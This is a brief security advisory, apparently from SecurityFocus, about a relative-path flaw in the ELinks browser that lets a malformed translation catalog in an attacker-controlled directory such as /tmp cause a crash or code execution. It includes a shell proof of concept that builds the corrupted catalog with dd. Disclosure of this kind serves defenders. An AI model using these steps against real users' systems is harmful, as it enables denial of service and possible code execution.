ELinks Relative Path Arbitrary Code Execution Vulnerability

To exploit this issue, attackers must entice victims into executing the application from a controlled directory (such as '/tmp').

To trigger a denial of service, the attacker must supply a malformed catalog.

The following proof of concept is available:

$ mkdir -p /tmp/elinks/{run,po}
$ cp /usr/share/locale/fr/LC_MESSAGES/elinks.mo /tmp/elinks/po/fr.gmo
$ dd if=/dev/urandom of=/tmp/elinks/po/fr.gmo bs=1024 seek=1 count=200
$ cd /tmp/elinks/run


Privacy Statement
Copyright 2010, SecurityFocus